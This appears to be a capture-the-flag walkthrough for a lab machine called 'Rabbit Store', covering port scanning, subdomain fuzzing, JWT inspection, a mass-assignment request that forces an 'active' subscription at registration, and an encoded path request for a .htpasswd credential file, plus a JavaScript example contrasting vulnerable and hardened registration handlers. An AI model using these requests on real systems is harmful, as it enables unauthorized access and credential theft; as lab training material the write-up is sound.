Rabbit Store
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

PORT      STATE  SERVICE VERSION
22/tcp    open   ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 3f:da:55:0b:b3:a9:3b:09:5f:b1:db:53:5e:0b:ef:e2 (ECDSA)
|_  256 b7:d3:2e:a7:08:91:66:6b:30:d2:0c:f7:90:cf:9a:f4 (ED25519)
80/tcp    open   http    Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://cloudsite.thm/
3397/tcp  closed saposs
4369/tcp  open   epmd    Erlang Port Mapper Daemon
| epmd-info:
|   epmd_port: 4369
|   nodes:
|_    rabbit: 25672
25672/tcp open   unknown
32469/tcp closed unknown
44774/tcp closed unknown
51612/tcp closed unknown
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

HTTP 80
Redirects to http://cloudsite.thm/

Login → http://storage.cloudsite.thm/
Tech Stack
cloudsite.thm
- Apache HTTP Server 2.4.52
- Ubuntu
- OWL Carousel

storage.cloudsite.thm
- Apache/2.4.52 (Ubuntu)
- Express

vhost-fuzzer cloudsite.thm ~/Wordlist/SecLists/Discovery/DNS/subdomains-top1million-20000.txt http://cloudsite.thm --fw 18

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://cloudsite.thm
 :: Wordlist         : FUZZ:/SecLists/Discovery/DNS/subdomains-top1million-20000.txt
 :: Header           : Host: FUZZ.cloudsite.thm
 :: Header           : User-Agent: PENTEST
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response words: 18
________________________________________________

storage                 [Status: 200, Size: 9039, Words: 3183, Lines: 263, Duration: 268ms]

POST /api/login HTTP/1.1
Host: storage.cloudsite.thm
Content-Length: 42
Accept-Language: en-GB,en;q=0.9
Accept: application/json, text/plain, */*
Content-Type: application/json
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Origin: http://storage.cloudsite.thm
Referer: http://storage.cloudsite.thm/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

{"email":"test@test.com","password":"123"}

signup
POST /api/register HTTP/1.1
Host: storage.cloudsite.thm
Content-Length: 50
Accept-Language: en-GB,en;q=0.9
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Content-Type: application/json
Accept: */*
Origin: http://storage.cloudsite.thm
Referer: http://storage.cloudsite.thm/register.html
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

{"email":"john@test.com","password":"password123"}

sign up user
http://storage.cloudsite.thm/dashboard/inactive

GET /dashboard/active HTTP/1.1
Host: storage.cloudsite.thm
Accept-Language: en-GB,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJlbWFpbCI6ImpvaG5AdGVzdC5jb20iLCJzdWJzY3JpcHRpb24iOiJpbmFjdGl2ZSIsImlhdCI6MTc0OTcwNzEyOSwiZXhwIjoxNzQ5NzEwNzI5fQ.bAvx1OLSliPZLY7cv0It7TcOAnka4ip4XtSsMoOWZGE
Connection: keep-alive

jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJlbWFpbCI6ImpvaG5AdGVzdC5jb20iLCJzdWJzY3JpcHRpb24iOiJpbmFjdGl2ZSIsImlhdCI6MTc0OTcwNzEyOSwiZXhwIjoxNzQ5NzEwNzI5fQ.bAvx1OLSliPZLY7cv0It7TcOAnka4ip4XtSsMoOWZGE

Headers = {
  "alg": "HS256",
  "typ": "JWT"
}
Payload = {
  "email": "john@test.com",
  "subscription": "inactive",
  "iat": 1749707129,
  "exp": 1749710729
}
Signature = "bAvx1OLSliPZLY7cv0It7TcOAnka4ip4XtSsMoOWZGE"

- server checks signature
- secret not crackable
Mass assignment
subscription is a possible field of the user object, so it is added to the registration body.

POST /api/register HTTP/1.1

{ "email":"john2@test.com", "password":"password123" }

POST /api/register HTTP/1.1
Host: storage.cloudsite.thm
Content-Length: 73
Accept-Language: en-GB,en;q=0.9
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Content-Type: application/json
Accept: */*
Origin: http://storage.cloudsite.thm
Referer: http://storage.cloudsite.thm/register.html
Accept-Encoding: gzip, deflate, br
Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJlbWFpbCI6ImpvaG4yQHRlc3QuY29tIiwic3Vic2NyaXB0aW9uIjoiaW5hY3RpdmUiLCJpYXQiOjE3NDk3MDc1OTksImV4cCI6MTc0OTcxMTE5OX0.6Z4Y28KYisl8K-Xx2IZ2t1tG9QjWeF1NYr0J1yjYgoM
Connection: keep-alive

{"email":"max@test.com","password":"test123","subscription":"active"}

HTTP/1.1 201 Created
Date: Thu, 12 Jun 2025 06:40:56 GMT
Server: Apache/2.4.52 (Ubuntu)
X-Powered-By: Express
Content-Type: application/json; charset=utf-8
Content-Length: 42
ETag: W/"2a-nMoFx54+czTntmSLXl3mqIsZV4A"
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

{"message":"User registered successfully"}
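
The mass-assignment behaviour shown above, as an added example that is not the application's own code: a registration handler that copies the whole JSON body into the user record, next to one that allowlists fields and sets subscription on the server. The function names, the in-memory store and the allowlist are assumptions.

```javascript
// Added example, not the Rabbit Store application's code. Handler names, the
// in-memory "db" array and ALLOWED_FIELDS are assumptions for illustration.
// Password hashing is omitted to keep the focus on field binding.

// Vulnerable pattern: the whole JSON body becomes the user record, so any
// extra key the client sends (e.g. "subscription") overrides the default.
function registerVulnerable(db, body) {
  const user = { subscription: "inactive", ...body };
  db.push(user);
  return { status: 201, user };
}

// Hardened pattern: only allowlisted keys are accepted and type-checked,
// unknown keys are rejected, and privileged fields are set by the server.
const ALLOWED_FIELDS = new Set(["email", "password"]);

function registerHardened(db, body) {
  if (body === null || typeof body !== "object" || Array.isArray(body)) {
    return { status: 400, error: "body must be a JSON object" };
  }
  const unexpected = Object.keys(body).filter((k) => !ALLOWED_FIELDS.has(k));
  if (unexpected.length > 0) {
    // A rejected extra field is also worth logging as a probing signal.
    return { status: 400, error: "unexpected fields: " + unexpected.join(", ") };
  }
  for (const field of ALLOWED_FIELDS) {
    if (typeof body[field] !== "string" || body[field].length === 0) {
      return { status: 400, error: "missing or invalid field: " + field };
    }
  }
  const user = { email: body.email, password: body.password, subscription: "inactive" };
  db.push(user);
  return { status: 201, user };
}

// Constructed inputs: the two registration bodies shown on this page.
const probe = JSON.parse(
  '{"email":"max@test.com","password":"test123","subscription":"active"}'
);
const normal = { email: "john2@test.com", password: "password123" };

console.log(registerVulnerable([], probe).user.subscription);
console.log(registerHardened([], probe).error);
console.log(registerHardened([], normal).user.subscription);
```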

Path traversal
.htpasswd
GET /assets/%2ehtpasswd HTTP/1.1
Host: storage.cloudsite.thm
Accept-Language: en-GB,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://storage.cloudsite.thm/assets/plugins/testimonial/
Accept-Encoding: gzip, deflate, br
Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJlbWFpbCI6ImpvaG4yQHRlc3QuY29tIiwic3Vic2NyaXB0aW9uIjoiaW5hY3RpdmUiLCJpYXQiOjE3NDk3MDc1OTksImV4cCI6MTc0OTcxMTE5OX0.6Z4Y28KYisl8K-Xx2IZ2t1tG9QjWeF1NYr0J1yjYgoM
Connection: keep-alive